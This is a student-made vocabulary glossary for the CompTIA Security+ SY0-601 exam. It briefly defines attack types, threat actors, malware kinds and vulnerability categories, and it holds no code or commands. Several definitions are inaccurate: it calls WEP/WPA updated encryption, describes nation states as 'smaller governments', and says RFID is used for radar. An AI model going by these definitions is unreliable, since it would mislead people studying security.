CompTIA SY0-601 Security+ Exam Vocabulary (Section 1: Attacks, Threats, and Vulnerabilities)
ZIP Bomb
A 42 KB .zip compressed file that extracts into 4.5 Petabytes (4,500 TB) worth of data. Of course, this leads to resource exhaustion.
Blue Team
A Security Team group. Defensive; protecting the data. They do operational security and control incident response. They hunt for threats, to find and fix holes.
White Team
A Security Team group. Not on a team, they administer the interactions between red and blue, enforcing the rules and resolving any issues. They also manage post-event assessments.
Red Team
A Security Team group. Offensive; they are the hired attackers that ethically try to hack and exploit vulnerabilities to find them and patch them.
Purple Team
A Security Team group. Red and blue teams working together, cooperating instead of competing. They give feedback to each other based on results.
Refactoring
A driver manipulation method. Developers rewrite the code without changing the driver's behavior.
Shimming
A driver manipulation method. It uses additional code to modify the behavior of a driver. This is often done for backwards compatibility, like for Windows. This can be abused by attackers.
Typosquatting
A form of URL hijacking that relies on mistakes when typing a link. ex: https://professormessor.com
Prepending
A form of URL hijacking that relies on someone overlooking the link when they click on it or see an email from the domain. ex: https://pproffessormesser.com
On Premises Security
A form of security against attacks, through the client. Positives: + Customize your security posture (you have full control). + On-site team can manage security better. + Local team manages uptime and availability. Negatives: -A local team may be expensive and difficult to staff. -Security changes can take time.
Cloud-Based Security
A form of security against attacks, through the cloud. Positives: + data in a secure environment + providers are managing large-scale security + limited downtime + scalable security options + less expensive Negatives: - third party may have access - users must follow security best practices - not as customizable as necessary
Trojan Horse
A malware that pretends to be something else, so it can take over your computer. Once it's inside, it has free reign.
Crypto-ransomware
A more powerful malware that encrypts your information and slowly deletes it, unless you decide to pay up to get it unencrypted and saved.
Botnets
A network of bots that work together for a common goal, often causing a DDoS. They are often rented by hackers.
Spraying Attack
A password attack where attackers test the most common passwords to see if the user has one of them. This is often taken from the top 3 passwords on the list.
Radio Frequency Jamming
A person or a device intentionally or unintentionally interferes with your wireless network transmissions. The receiving device cannot get a solid connection to the network. This may be caused by microwave ovens and fluorescent lights (assuming it was accidental).
Spear Phishing
A phishing attack targeting a specific user, often one with a lot of information or access to money (like a CEO/CFO).
Pharming
A redirection/reroute from a legitimate site to a bogus site. Usually done through vulnerabilities on the original site.
Resource Exhaustion
A situation in which a hardware device with limited resources (CPU, memory, file system storage, etc.) is exploited by an attacker who intentionally tries to consume more resources than intended. This is often targeted on purpose and leads to a crash/DDoS.
Influence Campaign
A sway of public opinion on political and social issues. They aim to manipulate people's thinking in a certain area.
Buffer Overflow
A technique for crashing by sending too much data to the buffer in a computer's memory, causing it to overflow, spilling into other memory areas.
Hoax
A threat that doesn't actually exists. Wastes a lot of time and resources. (usually emails, social media posts, etc.)
Social Media Attack Vectors
A type of Attack Vector. Attackers can use the information that you post online (where you are and when, vacation pictures are a big part).
Supply Chain Attack Vectors
A type of Attack Vector. Corporations usually buy things from a third party, these can be tampered with on every step of the way.
Email Attack Vectors
A type of Attack Vector. Done through phishing or delivering malware through email. Sent to a potential victim.
Direct Access Attack Vectors
A type of Attack Vector. Involves physical access to a system, which is why they are usually locked up (to prevent this).
Cloud Attack Vectors
A type of Attack Vector. Involves publicly facing applications and services. They may be attacked and become vulnerable points.
Wireless Attack Vectors
A type of Attack Vector. Takes advantage of access points that may not be secure. Watch out for Rogue Access Points and Evil Twins.
Removable Media Attack Vectors
A type of Attack Vector. They can get around a firewall or other existing security. They could connect something that allows them to transfer data out. One example of this is malicious software on USB flash drives that can infect anything that it is plugged into.
Unauthorized Hackers
A type of Threat Actor & Hacker. These hackers are malicious and aim for personal gain. (ex. money, information, both, etc.)
Authorized Hackers
A type of Threat Actor & Hacker. They are hackers that are ethical with good intentions, and have permission to hack.
Semi-Authorized Hackers
A type of Threat Actor and Hacker. These hackers find a vulnerability (and aren't permitted to), but they don't use it. They may be more of a "researcher."
Shadow IT
A type of Threat Actor. Computer hardware, software, or services used on a private network without authorization from the system owner. Always done internally, and isn't stopped by some roadblocks.
Competitors
A type of Threat Actor. People who are against your company, basically. They are very sophisticated, and have significant funding. They have a variety of intentions, though -- stealing customer lists, taking financial information, and more. Or they might not do anything; they just have the potential to act on vulnerabilities.
Nation States
A type of Threat Actor. Smaller governments that could potentially band together to "hack" or attack something.
Insiders
A type of Threat Actor. Someone who is "inside" an institution, they may plan to attack it. The insider has inside knowledge, and attacks can be directed at vulnerable systems since they know what to hit.
Hacktivist
A type of Threat Actor. They are hackers with a purpose, they may want social change or a political agenda. They are often external. Hacks are usually sophisticated, and are very specific.
Organized Crime
A type of Threat Actor. They are professionals, motivated by money and almost always an external entity. They are very sophisticated and organized: one person hacks, one person manages exploits, another person sells the data, etc.
Script Kiddies
A type of Threat Actor. They run pre-made scripts to see if one of them functions to hack into the system. This can be external or internal.
Dark Web Intelligence
A type of Threat Intelligence. Accessing this area of the Internet is very difficult, yet a lot of information can be found there, often being the information of hacker groups and services (like what they do, their tools, what they are selling, etc).
Vulnerability Databases
A type of Threat Intelligence. Researchers find vulnerabilities and put it into this, allowing everyone to see it. It is a huge list of vulnerabilities, basically. -Some examples of this are the Common Vulnerabilities and Exposures (CVE) list, and the U.S National Vulnerability Database (NVD).
Predictive Analysis
A type of Threat Intelligence. The analyzation of data quickly to find suspicious patterns and behaviors to indicate potential attacks.
Closed Intelligence
A type of Threat Intelligence. This intelligence was compiled by someone else, and is unavailable to the public. However, it can be purchased.
File/Code Repositories
A type of Threat Intelligence. This may contain a public program that is used to hack into a computer. See what's published, and defend against it.
Local Industry Groups for Threat Research
A type of Threat Research. A gathering of local peers in the industry that may discuss local challenges and the securing of specific technologies.
Academic Journals Threat Research
A type of Threat Research. A very credible book that keeps up with the latest attack methods, often being very detailed and written by a professional.
Vulnerability Feeds for Threat Research
A type of Threat Research. Data supplied to vulnerability scan software that provides information about the latest vulnerabilities, often through notifications.
Social Media and Threat Research
A type of Threat Research. Hacking groups on here can be monitored, revealing potential exploit attempts.
Vendor Websites for Threat Research
A type of Threat Research. On this type of website, you can see if a vendor discovers a new vulnerability in their software; they know their software best, of course.
Conferences for Threat Research
A type of Threat Research. These may involve people meeting up to discuss potential security concerns and vulnerabilities, maybe even being an "early warning" of sorts.
Zero-Day Attack Vulnerability
A type of Vulnerability. An undiscovered vulnerability, which people work hard to find. They are important since it's hard to find something that isn't known about yet.
Error Vulnerability
A type of Vulnerability. Error messages can give a LOT to a hackers -- like service type, version information, and debug data. Obscure errors are needed. Ex: <code error> VS "This website failed to open the page."
Default Settings Vulnerability
A type of Vulnerability. Every device has a default login, hackers may attempt it to abuse it. Can be abused through Botnets at a massive speed.
Improper Patch Management Vulnerability
A type of Vulnerability. Happens if a patch is not applied properly. Make sure it IS so this is prevented.
Open Ports and Services Vulnerability
A type of Vulnerability. Make sure to manage access to ports that are opened by services/applications.
Open Permissions Vulnerability
A type of Vulnerability. Permissions are accidently left open, allowing too many people to access things (like cloud storage). Be sure to secure this!
Insecure Protocols Vulnerability
A type of Vulnerability. Some Protocols may not be encrypted; and traffic is sent in the clear. Make sure to not do this, and to use encryption if it is vital information.
Weak Encryption Vulnerability
A type of Vulnerability. Some encryption types are not secure enough in order to be safe. Updated encryption should be used instead, like WEP/WPA and more. Bad encryption would be ones with less than 128-bit key sizes, outdated hashes, and more.
Legacy Platform Vulnerability
A type of Vulnerability. The use of an older or outdated device which is installed still on the network. There may be a lot of easy access points within these due to the age of the technology. Either replace them, or protect them with firewalls and other safety methods.
Unsecured Root Accounts Vulnerability
A type of Vulnerability. This is where the main accounts, or "administrator" accounts, are hacked initially due to an easy-to-hack password. These need to be protected and also limited to only 1-2 accounts in a company.
Intrusive Scan
A type of scan. Finding a vulnerability and trying to exploit it.
Non-Intrusive Scan
A type of scan. Gathering information without attempting to exploit a vulnerability.
Non-Credentialed Scans
A type of scan. The scanner cannot log into the remote device.
Credential Scan
A type of scan. The scanner has access to the device; it can mimic an insider attack.
Race Conditions
A vulnerability that occurs when an ordered or timed set of processes is disrupted or altered by an exploit. Sometimes, things happen at the same time, which can be bad if you haven't planned for it. This can lead to devastating outcomes.
Vulnerabilities
A way for an attacker to get into a computer. There are many types of attacks.
APT
Advanced Persistent Threat. A type of Threat Actor. Attackers are in the network, undetected, and are persistent there until taken out.
NFC Attack
An attack against mobile devices that use Near Field Communication. Near Field Communication is a group of standards that allow mobile devices to communicate with nearby mobile devices.
Domain Hijacking
An attack that changes the registration of a domain name without permission from the owner. They may also just gain access to it. The attacker then gains access to where traffic flows.
SSL Stripping
An attack that focuses on stripping the security from HTTPS-enabled websites. Combines an on-path attack with a downgrade attack. Attackers must sit in the middle of the conversation, modifying data between the victim and the web server. The victim cannot easily see a problem. Relate to the SSL and TLS protocols.
MAC Flooding
An attack that sends numerous packets to a switch, each of which has a different source MAC address, in an attempt to use up the memory on the switch. If this is successful, the switch will change state to failopen mode, and memory will flow in many other places.
Bluejacking
An attack that sends unsolicited messages to Bluetooth-enabled devices. Think of an hijack. It was patched.
DNS Poisoning
An attack that substitutes DNS addresses so that the computer is automatically redirected to an attacker's device or website of their choice.
Directory Traversal
An attack that takes advantage of a vulnerability so that a user can move from the root directory to restricted directories. Ex: users shouldn't be able to browse the Window's folder.
Brute Force Attack
An attacker can use this attacking method by trying every possible password combination to get a hash result. This might take a lot of time. (They would start with 'aaaaa')
API Attacks
Application Programming Interface Attacks. Attackers look for vulnerabilities in this new communication path (it may expose sensitive information, DoS, privileged access, etc)
AI
Artificial Intelligence. Machines are getting smarter. They can identify patterns in data and improve predictions. This requires a lot of training data, but is very useful. Yet, it can be manipulated and confused to accidently give vital information.
Session Hijacking
Attacker gains access to the session ID and can send it to the server to gain access to the victim's account. Nothing else is needed. This can be obtained through the victim's cookies and other ways.
Credential Harvesting
Attackers collect login credentials; many ways to do this.
RFID Attack
Attacks against Radio-Frequency Identification systems. Some common attacks are eavesdropping, replay, and DoS. This technology is normally used for radar technology.
AIS
Automated Indicator Sharing. A type of Threat Intelligence. Basically indicates how to safely transfer information. Done through The Structured Information Expression (STIX).
Cross-Site Request
Browser loads information from multiple servers. Example: One server loads the words, another loads a YouTube video, another a picture, and others. This is normal, yet can be abused.
Backdoors
Created by some Malwares when it is installed. It installs a program that opens a "back door" to make it easier to get back into the system. Other Malware can use this backdoor.
XSRF
Cross-Site Request Forgery. Often known as "one-click attacks", it takes advantage of the trust that a web application has for the user. The web site trusts your browser, and requests can be made without your consent or knowledge.
XSS
Cross-site scripting. Called this due to browser security flaws (information from one site could be shared to another). One of the most common web application development errors, taking advantage of the trust a user has for a site Persistent: Attacker posts a message to a social network that includes the "malicious payload". It is now "persistent" -- everyone gets the malicious script when they view it. It does not have a specific target. This can spread quickly on social media. Non-persistent: Web site allows scripts to run in user input (search bar), attacker emails a link that can take advantage of this vulnerability, running a script that steals information. They can use the information (session IDS, cookies) to steal the user's information sneakily.
DoS
Denial of Service. Forcing the service to fail, usually by overloading it. It often takes advantage of a design flaw or vulnerability.
DDoS
Distributed Denial of Service. An army of computers is launched to bring down a service, by using all of the bandwidth or resources, creating a traffic spike. This is what botnets are used for, as the bots would make a coordinated attack.
On-Path Attack
Formerly known as "man in the middle" where the attacker redirects the victims traffic without there knowledge. They can intercept this traffic and send it back.
Privilege Escalation
Gaining a higher-level access to a system using a vulnerability or bug/design flaw. The higher the access, the more capable the attackers are to cause damage. This is a high-priority vulnerability.
Working Knowledge
How much is known about a penetration test. For example, what environment is it in? Unknown? Known? Partially known?
Bots
If your computer is infected, it becomes this. Can be put on your computer from a Trojan Horse or an application vulnerability. It is controlled through a Command and Control center, and otherwise just waits.
Wireless Disassociation Attack
In this attack, connections usually go from working to not working, then working again, and so on. Wireless deauthentication is what this is, and it is a significant wireless denial of service (DoS) attack.
Replay Attack
In this attack, when the client sends information, the attacker and hacker can both get it. Then the attacker sends their own request using their information, gaining access to the valid account.
Intelligence Fusion
In threat hunting, using sources of threat intelligence data to automate detection of adversary IoCs and TTPs.
IOC
Indicators of Compromise. A type of Threat Intelligence. An event that indicates an intrusion, like an unusual amount of network activity, or a change to file hash values (showing the modification of files) and more.
Cookies
Information stored on your computer by the browser. This is used for tracking, personalization, session management, etc. It usually isn't a security risk unless someone accesses them, as they contain a lot of personal data. Session IDs are often stored there.
Downgrade Attack
Instead of using perfectly good encryption, systems are forced to use something that's not great. This creates a vulnerability.
Injection Attack
Involves "adding" something that does not belong. Usually involves adding your own code stream or otherwise due to a vulnerability.
Threat Intelligence
Involves having knowledge about threats. May involve collecting and researching information/data to stay informed.
Rainbow Tables
Large pre-generated data sets of encrypted passwords (from hashing) that is used in password attacks. Different tables would be needed for different hashing methods.
Malware
Malicious software which aims to do harm to your computer or your information. There are many, MANY methods of doing this. They often work together.
Viruses
Malware that can reproduce itself. They can "infect" many files and damage them. Thousands of new ones are made every week.
Ransomware
Malware that makes often fake threats to cause action. There are more extreme versions of this, however.
Rootkits
Malware that modifies the kernel of the OS to avoid being detected by antivirus/anti-malware. Often combined with other malware. Its invisible to the OS, Task Manager, and an antivirus/anti-malware
Worms
Malware that self-replicates. It uses the network as a transmission medium, spreading very quickly and easily. It can take over thousands of devices by itself, and cannot easily be stopped once inside the network.
Spyware
Malware that spies on you, taking your information for advertising identity theft, and affiliate fraud. May also include browser monitoring with keylogging and otherwise.
Malicious Hardware
May include USBs and flash drives. Do not plug in an unknown piece of hardware into your computer, as it might turn out to be this. It can infect the computer with malware through many methods.
Plaintext
Normal text that has not been encrypted. Storing passwords like this is a terrible idea.
Logic Bombs
Often planted to wait for a predefined event. This can be a time or date, or a user event. It is difficult to identify, but also difficult to recover if it explodes. These are usually installed by malware, and they can delete storage and master boot records.
OSINT
Open-Source Intelligence. A type of Threat Intelligence. Publicly available and a good place to start searching. Includes the Internet and governmental/commercial data.
PUPs
Potentially Unwanted Programs. Identified by anti-virus and is usually installed with other software.
Salt
Random data added to a password when hashing. Every user gets their own amount of salt. This makes it harder, if not impossible, to use Rainbow Tables to crack a hash.
Supply Chain Order
Raw materials -> Suppliers -> Manufacturers -> Distributors -> Customers -> Consumers
URL Hijacking
Relies on mistakes in the URL to make a user go to a phishing site. Includes Typosquatting, Prepending, and more.
RATs
Remote Access Trojans. The ultimate backdoor, malware installs the server/service/host, and attackers can connect to it with the client software. They basically gain access to a device and can keylog, screen record, copy files, and more.
RFCs Threat Research
Requests for Comments. A type of Threat Research. They analyze threats, being published by the Internet Society (ISOC) and written by the Internet Engineering Task Force (IETF).
Smishing
SMS/text phishing
SIEM
Security Information and Event Management. The logging of security events and information. Data from different sources may be able to be correlated, linking diverse data types. Additionally, forensic analysis can be done after a security breach happens.
SOAR
Security Orchestration, Automation, Response. Involves keeping information safe.
SSRF
Server-Side Request Forgery. Attacker can find a vulnerability in a web application, send requests to a web server, and perform the request on behalf of the attacker. Often caused by bad programming.
MAC Cloning
Setting the MAC address of your PC or any other MAC address as your device WAN port. Attackers can use this by setting their MAC address to match the address of an existing device. This allows them to circumvent filters.
Shoulder Surfing
Simply looking over someone's shoulder to obtain any information on the computer. This could include vital information, depending on what the victim is doing.
Pretexting
Social engineering; lying to get information. The attacker creates a situation and puts themselves into it.
Impersonation
Social engineering; pretending to be someone who you are not. For example, an attacker may forge an email from Microsoft commenting on concerns with a user's computer. Tricking someone with this may cause them to give away more information.
Improper Input Handling
Software that allows the user to enter data but does not validate or filter user input to prevent a malicious action. An attacker could type a line of code to make the website do something unintended.
Adware
Software that displays advertisements. Often installed with other software (a PUP). It may cause issues with performance. Not really malware; it doesn't try to harm your computer, at least on the surface.
Improper Error Handling
Software that does not properly trap an error condition and provides an attacker with underlying access to the system. Errors should not have a lot of detail to prevent this.
Skimming
Stealing credit card information, usually during a normal transaction (with cameras, card readers, or human eyes). People can copy data from the card, such as the number, expiration date, your name, and more. Attackers can use this information for other transactions.
STIX
Structured Information Expression. A type of Threat Intelligence. Describes cyber threat information and includes motivations, abilities, capabilities, and response information. Securely shared by The Trusted Automated Exchange of Indicator Information (TAXII).
TTP with Threat Research
Tactics, Techniques and Procedures. A type of Threat Research. What are adversaries doing, and how are they doing it? Search through data and networks and look for threats.
Hashing
Takes a password and basically turns it into a "fingerprint". It cannot be reversed, making it a common way to store passwords.
Security Teams
Teams may be put together to work and secure a system, involving many different skills (such as operational security, penetration testing, exploit research, etc).
Penetration Testing
Testing if your security can be penetrated through; basically simulates an attack. Similar to vulnerability scanning, but the vulnerability is actually being exploited. In this, make sure the following is done: -Create an important document identifying the parameters of the test. -Say the type of test and when it happens -The rules of the test & how to react to it
ARP Poisoning
The Address Resolution Protocol (ARP) maps IP addresses to network interfaces (MAC addresses). This process means injecting a false IP:MAC lookup into the victims ARP cache. This can be used to perform a variety of attacks, including DoS, spoofing and man in the middle.
The CTA
The Cyber Threat Alliance. A type of Threat Intelligence. This group's members upload specifically formatted threat intelligence. It is scored and validated across other submissions. Members can react faster to threats that are given.
Dumpster Diving
The act of an attacker looking into the trash to possibly find information.
Vulnerability Scanning
The act of scanning for weaknesses and susceptibilities in the network and on individual systems. It is like a penetration test that tries to find weak spots by poking around and see what's open.
Card Cloning
The duplication of a credit card that is unauthorized. It looks, feels, and works like the original card. Does not work with chip cards; the card must be a magnetic swipe card.
Threat Actors
The entity responsible for an event that has an impact on the safety of another identity, often called the malicious actor. There are a broad scope of these, motivations may vary as well.
Domain Reputation
The overall "health" of your branded domain as interpreted by mailbox providers. A bad reputation can cause email delivery to fail. This can prevent spam, but may also prevent a business from being visited.
Threat Research
The overall idea of knowing your enemy to prevent an attack.
Watering Hole Attack
The process of an attacker targeting a third party instead of you to get your information. They basically steal your information from a website you may commonly visit, or otherwise.
Vulnerability Research
The process of analyzing protocols, services, and configurations to discover the vulnerabilities and design flaws that will expose an operating system and its applications to exploit, attack, or misuse. Vulnerabilities can be cross-referenced online. A website like https://nvd.nist.gov/ can be used to do this.
Reconnaissance
The process of observation. You need information before the attack to make it as efficient as possible. Attackers will do this, your job is to prevent it.
Threat Hunting
The process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions.
Vulnerability Impact
The result of a vulnerability being used. Often in the form of the following: -Data loss -Identity theft -Financial loss -Reputation impacts -Availability loss (DoS attacks)
Hash Collision
The same hash value for two different plaintexts. This can be found through brute force. The attacker can generate multiple versions of plaintext to match the hashes.
Keylogging
The tracking of keystrokes, often done through malware.
Dictionary Attack
The use of a dictionary to find a password from common words. For example, someone could make their password 'doorframe' or even simpler words like 'dog' which can make it easier for the attacker to crack the account.
Macros
This automates functions within an application, making it easier to use. This can cause security vulnerabilities though -- hackers can make automated exploits, only needing a user to run a file and agree to run this. A common example of one of these is a press of a button causing three or four keys to be pressed with a one second delay in between.
Memory Leaks
This issue can occur over time when an application can use memory over time but also fail to release it. The result is more and more memory is used until the system finally crashes or hangs.
Scripts
This leads to an automation of tasks. This may be used for updates on a computer, or detecting potential problems and solving them before they happen. Attacks can also be automated using these.
TOCTOU Attack
Time-of-check to time-of-use attack. This attack checks for things that occur on the system, and may abuse other things happening at the same time, or abuse any weirdness that happens when two things are done at the same time.
Rogue Access Points
Unauthorized access points that are set up by a department or an individual. May or may not malicious, but either way, it is a significant backdoor into a network.
Spam
Unsolicited messages, often sent through mail, that may contain advertising or even malicious intent.
Tailgating
Using an unauthorized person to gain unauthorized access to a building by using their credentials.
Social Engineering
Using social skills to trick people into revealing information; often done under pressure. For example, an email may be told as "urgent" causing someone to act quickly, possibly not thinking in the process.
VBA
Visual Basic for Applications. The programming language used to write computer programs in the Microsoft Windows environment.
Vishing
Voice phishing
Attack Vectors
Vulnerabilities that exist in networks, operating systems, apps, databases, mobile devices, and cloud environments. IT professionals spend a lot of their time finding and patching these.
Evil Twins
Wireless networks that pretend to offer trustworthy Wi-Fi connections to the Internet. It looks legitimate, but it isn't.
Phishing
a malicious person or company "pretending" to be who they aren't. For example, a hacker may try to disguise an email filled with malicious content as an Amazon email.
Supply Chain
the connected chain of all of the business entities that create hardware. One exploit within the chain can affect the entire chain.
